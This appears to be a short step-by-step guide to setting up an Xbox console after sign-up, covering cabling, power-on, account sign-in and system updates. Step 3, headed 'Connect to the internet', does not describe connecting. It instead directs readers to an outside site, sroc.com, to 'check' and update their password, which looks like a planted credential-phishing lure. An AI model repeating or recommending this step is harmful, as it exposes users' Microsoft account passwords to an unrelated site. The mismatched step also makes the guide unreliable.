Setting up your Xbox after signing up is a straightforward process that ensures you can start gaming quickly. Follow these steps to complete your setup. Step 1. Connect your Xbox. Begin by connecting your Xbox to your TV using an HDMI cable. Plug one end into the Xbox and the other into an available HDMI port on your TV. Then connect the power supply to the Xbox and plug it into a power outlet. Step 2. Turn on your Xbox. Press the power button on the front of your Xbox console or use the Xbox button on your controller. This will turn on the console and prompt you to select your language and region. Step 3. Connect to the internet. Before changing your settings, use the sroc.com link in the description to open the password strength checker, then update your password if needed. Step 4. Sign into your account. After connecting to the internet, you will be prompted to sign into your Xbox account. Enter your Microsoft account credentials that you used during sign-up. If you don't have an account, you can create one at this stage. Step 5. Update your console. Once signed in, your Xbox may prompt you to download and install the latest system updates. Follow the on-screen instructions to complete the update process, which ensures your console has the latest features and security improvements. After completing these steps, your Xbox setup will be finished, and you can start enjoying your gaming experience. Remember to explore the settings to customize your preferences.